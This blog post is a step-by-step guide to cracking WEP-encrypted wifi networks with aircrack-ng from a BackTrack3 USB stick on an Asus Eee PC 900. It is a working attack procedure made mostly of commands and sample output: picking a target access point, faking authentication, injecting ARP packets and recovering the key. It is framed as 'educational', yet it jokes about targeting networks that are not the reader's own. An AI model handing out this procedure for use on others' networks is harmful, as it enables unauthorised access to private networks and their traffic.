Saturday 24 November 2012

aircrack-ng On Eee PC 900 Guide

16 May 2008 by George Hafiz
If you now own a shiny new Asus Eee PC 900 and are interested in a little bit of educational WEP encryption cracking, then you will be grateful to hear that I've written a guide just for you :) Strictly speaking, I wrote this 3 years ago for myself and my rt8180 chipset wireless card so that I'd not forget how to do it, but either way, I've modified it to be perfect for us Eee PC 900 owners!


If you haven't done so already, you're going to need to download and install BackTrack3 onto a USB stick, (or burn to a CD and use a USB disc drive, although I strongly suggest you use a memory stick).

To do so, you'll need to go to the Remote-Exploit.org Download Page and get the USB version (or CD if you actually want to). Pick any mirror, or use a torrent if you're feeling adventerous.

In the RAR, you'll find two dir's deep, two folders, one called 'boot' and the other called 'BT3'. Follow the instructs in INSTALL.txt if you are in Linux. On Windows, go into 'boot' via CMD.exe and execute 'bootinst.bat'. Follow the prompts.

Now, you should have a bootable USB stick. Whip it out your PC and stick it in your Eee PC. Put it in the USB socket on the LEFT side, this seems to be the only one I can boot from with mine. Turn on your Eee PC. When you see the GUI POST (when it says Press F2 for setup etc.) press 'esc' and you will be presented with a few places to boot from.

Choose your USB device. Mine's called a Sandisk Cruzer, 'cause I have a Sandisk Cruzer USB stick. Think similarly for your own USB stick ;). You will be presented from a list. Just choose the first one, and it will say after a minute, 'you have an odd display' or something similar. Just hit space to shut it up. After a while, it will come up with a Desktop.

Now, open up a terminal window with Ctrl+Alt+T. Right click in the black area and open another session, twice, so that you now have 3 sessions in tabs open. In the first one, run: airmon-ng start wifi0This will then come up and say that the interface ath1 has been put in monitor mode. From now on, that's the interface you will use.
Now, in the same session, enter:

airodump-ng ath

Now, you will see a list of any APs in the area, with information such as cipher, authentication type etc. The only thing I'm going to show you how to crack here is cipher WEP, and authentication OPN. Anything else requires a much more detailed review, and is more complicated.
Good, now you've found who you want to target, Ctrl+C to stop airodump-ng, and do:

airodump-ng -c [channel] --bssid [AP MAC] -w [filename] ath1

To break down what's done here: [channel] should be the channel of the target AP. [AP MAC] should be the MAC addess, or BSSID of the target, and [filename] can be any name you like, make it something you'll recognise, for example if the target was called 'linksys' then make the filename 'linksys1'. Keep it short and simple. Next, we're going to associate with the AP so we can inject packets and speed up airodump-ng catching data. In the second session we opened earlier, do:

aireplay-ng --fakeauth 0 -e [AP SSID] -a [AP MAC] ath1

Cool, now you should get something like: 

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)
Nice, if you get this, you're sorted! If you don't, you probably have a picky target, or they are using MAC address blocking. Try this for picky AP's.

Aireplay-ng --fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1 If you see this: 
18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
Then hooray, you've done it =). Else, give up, and find another target, I mean, change YOUR router settings...
Now it's time to start injecting. I hope you're not afraid of needles:

aireplay-ng -3 -b [AP MAC] ath1 -x 250

It will sit and wait for an ARP ack or request now. If you happen to have a BTHomeHub, then this shouldn't take long, even if there are no active clients on the AP. Once it gets an ARP, numbers will start going crazy, so you know it's working. Go to session one and watch the data column number rise dramatically.
Right, now we play the waiting game. Wait until the data number is about 40,000. Then start crackin'! In the third session, enter:

aircrack-ng -z -b [AP MAC] [filename*.cap

Don't forget to enter in your filename, in our example, linksys1*.cap. It willstart working on it, and display the WEP key when finished. As a footnote, remember whenever you are entering the SSID (the name of the network), it is case sensitive, so BTHomeHub-FE1D will NEED you to enter in the capitals there, otherwise you won't be able to associate.
Happy educating ;0







Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)